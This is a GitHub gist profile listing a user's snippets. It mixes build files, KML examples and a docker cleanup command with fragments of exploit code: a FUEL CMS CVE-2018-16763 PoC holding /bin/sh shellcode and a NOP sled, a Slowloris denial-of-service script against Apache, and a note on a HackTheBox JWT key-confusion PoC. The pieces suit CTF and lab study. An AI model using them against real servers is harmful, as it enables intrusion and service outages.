Skip to content

Instantly share code, notes, and snippets.


James Fraser wulfgarpro

View GitHub Profile
wulfgarpro /
Last active Nov 2, 2020
HTB "Under Construction" CVE-2015-9235 PoC
CVE-2015-9235 PoC, known as
"JWT HS/RSA key confusion vulnerability".
This PoC was used to solve the HTB challenge
"Under Construction" on HackTheBox (HTB).
Token was obtained by logging into the
wulfgarpro /
Created Sep 29, 2020
FUEL CMS v1.4.1 CVE-2018-16763 PoC
FUEL CMS v1.4.1 CVE-2018-16763 PoC.
This PoC was derived from:
import argparse
import urllib
import requests
parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')
shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
shellcode += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
shellcode += "\x80"
NOP_SLED = "\x90" * (BUF_SIZE - len(shellcode))

Keybase proof

I hereby claim:

  • I am wulfgarpro on github.
  • I am wulfgarpro ( on keybase.
  • I have a public key ASC8ENkegPmPXmvdtPn9D7MLtZLEmUW4JLAErh-1Zn0p2Ao

To claim this, I am signing this object:

wulfgarpro / slowloris.js
Last active May 23, 2017
Slowloris example against apache2 on Ubuntu 16.10 (yakkety) "2.4.18-2ubuntu4.1"
View slowloris.js
'use strict';
const net = require('net');
const maxConnections = 200; // Max connections
const host = '';
const port = 80;
let connections= [];
function Connection(h, p) {
wulfgarpro / Makefile
Last active Jan 23, 2017
makefile header dependency target
View Makefile
SRCS = a.c
depend: .depend
.depend: $(SRCS)
rm -f ./.depend
$(CC) $(CFLAGS) -MM $^ -MF ./.depend;
include .depend
wulfgarpro / CMakeLists.txt
Last active Jul 14, 2016
Example cmake file with gtest
View CMakeLists.txt
cmake_minimum_required (VERSION 2.6)
option (test "Build all tests." ON)
project (Tutorial)
set (CMAKE_CXX_FLAGS "-g -Wall")
#add_subdirectory (src/tutorial)
# The version number.
wulfgarpro /
Last active Feb 21, 2016
cgi script in python to generate kml LineString with LineStyle
import random
lat_a = random.randrange(35, 40)
lon_a = random.randrange(-120, -112)
lat_b = random.randrange(35, 40)
lon_b = random.randrange(-120, -112)
kml = (
wulfgarpro / cgi-kml.kml
Last active Feb 21, 2016
Example kml to load cgi script using NetworkLink with flyToView/refreshInterval enabled
View cgi-kml.kml
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="">
<name>Network Links</name>
<description>Network link example 1</description>
<name>Random Placemark</name>
wulfgarpro /
Created Dec 1, 2015
Single line to remove all containers from docker
docker ps -a | awk '{ print $1 }' | xargs -I {} docker rm -f {}